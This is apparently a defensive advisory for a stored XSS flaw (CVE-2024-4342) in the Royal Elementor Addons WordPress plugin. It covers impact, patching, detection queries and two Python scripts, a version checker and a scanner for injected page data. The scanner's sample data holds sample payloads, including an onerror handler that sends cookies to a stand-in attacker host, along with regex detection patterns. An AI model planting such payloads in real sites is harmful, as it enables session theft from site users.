CVE-2024-4342
📋 TL;DR
The Royal Elementor Addons and Templates WordPress plugin has a stored XSS vulnerability in several widgets (Image Hotspots, Image Accordion, Off Canvas, Woo Grid and Product Mini Cart, the files changed in the fix): attributes supplied by the page author are not sufficiently sanitized and escaped on output. Authenticated attackers with contributor-level access or higher can inject malicious scripts that execute when users view affected pages. This affects all versions up to and including 1.3.975.
💻 Affected Systems
- Royal Elementor Addons and Templates WordPress plugin
📦 What is this software?
Royal Elementor Addons and Templates, published on WordPress.org by the vendor of the same name (Royal Elementor Addons). It adds widgets and templates to the Elementor page builder, which is why the affected code lives in per-widget PHP files.
⚠️ Risk & Real-World Impact
Worst Case
Attackers could hijack an administrator's session or have the victim's browser create a new administrator account, redirect users to malicious sites, deface websites, or perform actions on behalf of authenticated users.
Likely Case
Attackers with contributor access inject malicious scripts to steal user session cookies or perform limited site defacement.
If Mitigated
With proper user role management and content review (no untrusted contributor accounts, and contributor-created pages reviewed before they are previewed by privileged users or published), impact is limited to script execution in the browser of whoever views the injected page; if that is only the attacker, there is no privilege escalation.
🎯 Exploit Status
Exploitation requires an authenticated account with contributor-level access or higher. Because contributors cannot publish, the payload typically fires when an editor or administrator previews or reviews the crafted page, or once it is published. Five widgets are affected, so an attacker has several places to plant a payload, and exploitation is straightforward once authenticated.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 1.3.976
Vendor Advisory: https://plugins.trac.wordpress.org/changeset/3094946/
Restart Required: No
Instructions:
1. Log into the WordPress admin panel.
2. Navigate to Plugins > Installed Plugins.
3. Find 'Royal Elementor Addons and Templates'.
4. Click 'Update Now' if available.
5. Alternatively, download version 1.3.976 or later from the WordPress.org plugin repository and update manually.
🔧 Temporary Workarounds
Restrict User Roles
Limit contributor and author roles to trusted users only. Consider removing contributor access entirely if it is not needed.
Disable Vulnerable Widgets
Temporarily disable the Image Hotspots, Image Accordion, Off Canvas, Woo Grid and Product Mini Cart widgets (the widgets whose files changed in the fix) in the plugin's settings.
🧯 If You Can't Patch
- Implement strict content review process for all posts/pages created by contributors
- Install a web application firewall (WAF) with XSS protection rules; make sure the rules also inspect the authenticated Elementor editor save requests (admin-ajax.php), since that is where the widget settings carrying the payload are stored
🔍 How to Verify
Check if Vulnerable:
Check WordPress admin > Plugins > Installed Plugins for Royal Elementor Addons and Templates version. If version is 1.3.975 or lower, you are vulnerable.
Check Version:
wp plugin list --name='royal-elementor-addons' --field=version
Verify Fix Applied:
After updating, verify the plugin version shows 1.3.976 or higher in WordPress admin panel.
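For checking a fleet of sites, the version comparison should be numeric rather than a string compare (as a string, "1.3.1000" sorts before "1.3.976"). The following is an added example written for this advisory, not code from the plugin or from Wordfence; it assumes the plugin slug royal-elementor-addons and uses WP-CLI's `wp plugin get <slug> --field=version`:

```python
"""Decide from a reported plugin version whether CVE-2024-4342 applies.
Added example for this advisory; not code from the plugin or the vendor."""
from __future__ import annotations

import re
import subprocess

PLUGIN_SLUG = "royal-elementor-addons"   # slug under wp-content/plugins (assumed)
FIXED_VERSION = "1.3.976"                # first patched release per the advisory


def parse_version(version: str) -> tuple[int, ...]:
    """Turn '1.3.975' (or '1.3.975-beta') into a numeric tuple so that
    1.3.1000 sorts after 1.3.976; a plain string compare gets that wrong."""
    core = re.match(r"[\d.]+", version.strip())
    if not core:
        raise ValueError(f"unparseable version: {version!r}")
    return tuple(int(p) for p in core.group(0).strip(".").split("."))


def assess(version: str) -> str:
    """'vulnerable' for 1.3.975 and below, 'patched' for 1.3.976 and above."""
    if parse_version(version) < parse_version(FIXED_VERSION):
        return "vulnerable"
    return "patched"


def installed_version(wp_path: str = ".") -> str | None:
    """Ask WP-CLI for the installed version; None if the plugin is not installed
    (wp returns non-zero for an unknown slug)."""
    res = subprocess.run(
        ["wp", "plugin", "get", PLUGIN_SLUG, "--field=version", f"--path={wp_path}"],
        capture_output=True, text=True,
    )
    if res.returncode != 0:
        return None
    return res.stdout.strip()


if __name__ == "__main__":
    v = installed_version()
    if v is None:
        print(f"{PLUGIN_SLUG}: not installed")
    else:
        print(f"{PLUGIN_SLUG} {v}: {assess(v)}")
```

Run it from the WordPress root (or pass the site path to installed_version) on each host; anything reported as vulnerable still needs the 1.3.976 update.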
📡 Detection & Monitoring
Log Indicators:
- Unusual content modifications by contributor-level users
- Multiple failed login attempts followed by successful contributor login
Network Indicators:
- Unexpected inline script tags, event-handler attributes or javascript: URLs in page markup that carries 'wpr-' widget classes
SIEM Query (pseudo-syntax; adapt field names to your log source):
source="wordpress" AND (
  (event_type="plugin_update" AND plugin_name="royal-elementor-addons" AND old_version<="1.3.975")
  OR (event_type="content_edit" AND user_role="contributor" AND content_contains="<script>")
)
Note that a string comparison on old_version is lexicographic (1.3.1000 sorts before 1.3.976), and that content_contains="<script>" misses event-handler and javascript: payloads; treat the query as a starting point, not a complete detection.
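Elementor stores each page's widget tree as JSON in the _elementor_data post meta, so a retrospective hunt for already-stored payloads can scan that blob directly rather than rendered HTML. The following is an added example for this advisory, not code from the plugin or from Wordfence. It assumes the widget type names wpr-image-hotspots, wpr-image-accordion, wpr-offcanvas, wpr-woo-grid and wpr-product-mini-cart (taken from the patched file names in the changeset); the setting names inside the constructed sample are illustrative, not the plugin's real field names:

```python
"""Triage Elementor page data for script injection in Royal Elementor Addons
(wpr-*) widget settings. Added example for this advisory; it is not code from
the plugin or from Wordfence."""
from __future__ import annotations

import json
import re
from typing import Any, Iterator

# Widget type names are assumed from the patched files in changeset 3094946
# (wpr-image-hotspots.php etc.); adjust if your site reports different names.
FIXED_IN_1_3_976 = {
    "wpr-image-hotspots",
    "wpr-image-accordion",
    "wpr-offcanvas",
    "wpr-woo-grid",
    "wpr-product-mini-cart",
}

# Heuristic indicators of a stored XSS payload in a text or URL setting.
XSS_PATTERNS = [
    re.compile(r"<\s*script\b", re.I),
    re.compile(r"<\s*(iframe|object|embed|svg|math)\b", re.I),
    re.compile(r"\bon[a-z]+\s*=", re.I),   # onerror=, onload=, onmouseover= ...
    re.compile(r"javascript\s*:", re.I),
]


def iter_widgets(elements: list[dict]) -> Iterator[dict]:
    """Depth-first walk over Elementor's section/column/container tree."""
    for el in elements:
        if el.get("elType") == "widget":
            yield el
        yield from iter_widgets(el.get("elements", []))


def iter_strings(value: Any, path: str = "") -> Iterator[tuple[str, str]]:
    """Yield (dotted setting path, string) for every string nested in a value."""
    if isinstance(value, str):
        yield path, value
    elif isinstance(value, dict):
        for key, sub in value.items():
            yield from iter_strings(sub, f"{path}.{key}" if path else str(key))
    elif isinstance(value, list):
        for idx, sub in enumerate(value):
            yield from iter_strings(sub, f"{path}[{idx}]")


def scan_elementor_data(raw_json: str, post_id="?",
                        widget_types: set[str] | None = FIXED_IN_1_3_976) -> list[dict]:
    """Return one finding per suspicious string. widget_types=None scans every
    widget on the page instead of only the five fixed in 1.3.976."""
    findings = []
    for widget in iter_widgets(json.loads(raw_json)):
        wtype = widget.get("widgetType", "")
        if widget_types is not None and wtype not in widget_types:
            continue
        for setting, text in iter_strings(widget.get("settings", {})):
            for pat in XSS_PATTERNS:
                hit = pat.search(text)
                if hit:
                    findings.append({"post_id": post_id, "widget": wtype,
                                     "widget_id": widget.get("id"),
                                     "setting": setting, "match": hit.group(0)})
                    break
    return findings


# Constructed sample in the shape of a _elementor_data blob. Setting names
# inside the wpr-* widgets are illustrative, not the plugin's real field names.
SAMPLE_ELEMENTOR_DATA = json.dumps([{
    "id": "a1", "elType": "section", "elements": [{
        "id": "b2", "elType": "column", "elements": [
            {"id": "c3", "elType": "widget", "widgetType": "heading",
             "settings": {"title": "<script>alert(1)</script>"}},
            {"id": "d4", "elType": "widget", "widgetType": "wpr-image-hotspots",
             "settings": {"hotspots": [
                 {"hotspot_text": "Engine", "hotspot_link": {"url": "https://example.com/"}},
                 {"hotspot_text": "<img src=x onerror=\"fetch('https://attacker.invalid/?c='+document.cookie)\">"},
             ]}},
            {"id": "e5", "elType": "widget", "widgetType": "wpr-offcanvas",
             "settings": {"offcanvas_title": "Menu"}},
            {"id": "f6", "elType": "widget", "widgetType": "wpr-image-accordion",
             "settings": {"accordion_items": [
                 {"item_title": "Spring", "item_link": {"url": "javascript:alert(document.domain)"}},
             ]}},
        ]}]}])


if __name__ == "__main__":
    for finding in scan_elementor_data(SAMPLE_ELEMENTOR_DATA, post_id=42):
        print(finding)
```

On a live site, feed the function the output of `wp post meta get <post_id> _elementor_data` or the meta_value column from `SELECT post_id, meta_value FROM wp_postmeta WHERE meta_key = '_elementor_data'`, passing the post ID so findings can be traced to the page and, via the post's author, to the contributor account. The default scope is the five widgets fixed in 1.3.976; pass widget_types=None to sweep every widget when you suspect the account planted payloads elsewhere.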
🔗 References
- https://plugins.trac.wordpress.org/changeset/3094946/royal-elementor-addons/tags/1.3.976/modules/image-accordion/widgets/wpr-image-accordion.php?old=3086875&old_path=royal-elementor-addons%2Ftags%2F1.3.975%2Fmodules%2Fimage-accordion%2Fwidgets%2Fwpr-image-accordion.php
- https://plugins.trac.wordpress.org/changeset/3094946/royal-elementor-addons/tags/1.3.976/modules/image-hotspots/widgets/wpr-image-hotspots.php?old=3086875&old_path=royal-elementor-addons%2Ftags%2F1.3.975%2Fmodules%2Fimage-hotspots%2Fwidgets%2Fwpr-image-hotspots.php
- https://plugins.trac.wordpress.org/changeset/3094946/royal-elementor-addons/tags/1.3.976/modules/offcanvas/widgets/wpr-offcanvas.php?old=3086875&old_path=royal-elementor-addons%2Ftags%2F1.3.975%2Fmodules%2Foffcanvas%2Fwidgets%2Fwpr-offcanvas.php
- https://plugins.trac.wordpress.org/changeset/3094946/royal-elementor-addons/tags/1.3.976/modules/theme-builder/woocommerce/product-mini-cart/widgets/wpr-product-mini-cart.php?old=3086875&old_path=royal-elementor-addons%2Ftags%2F1.3.975%2Fmodules%2Ftheme-builder%2Fwoocommerce%2Fproduct-mini-cart%2Fwidgets%2Fwpr-product-mini-cart.php
- https://plugins.trac.wordpress.org/changeset/3094946/royal-elementor-addons/tags/1.3.976/modules/woo-grid/widgets/wpr-woo-grid.php?old=3086875&old_path=royal-elementor-addons%2Ftags%2F1.3.975%2Fmodules%2Fwoo-grid%2Fwidgets%2Fwpr-woo-grid.php
- https://www.wordfence.com/threat-intel/vulnerabilities/id/4d565196-592d-415c-b37c-e54456aa9ed8?source=cve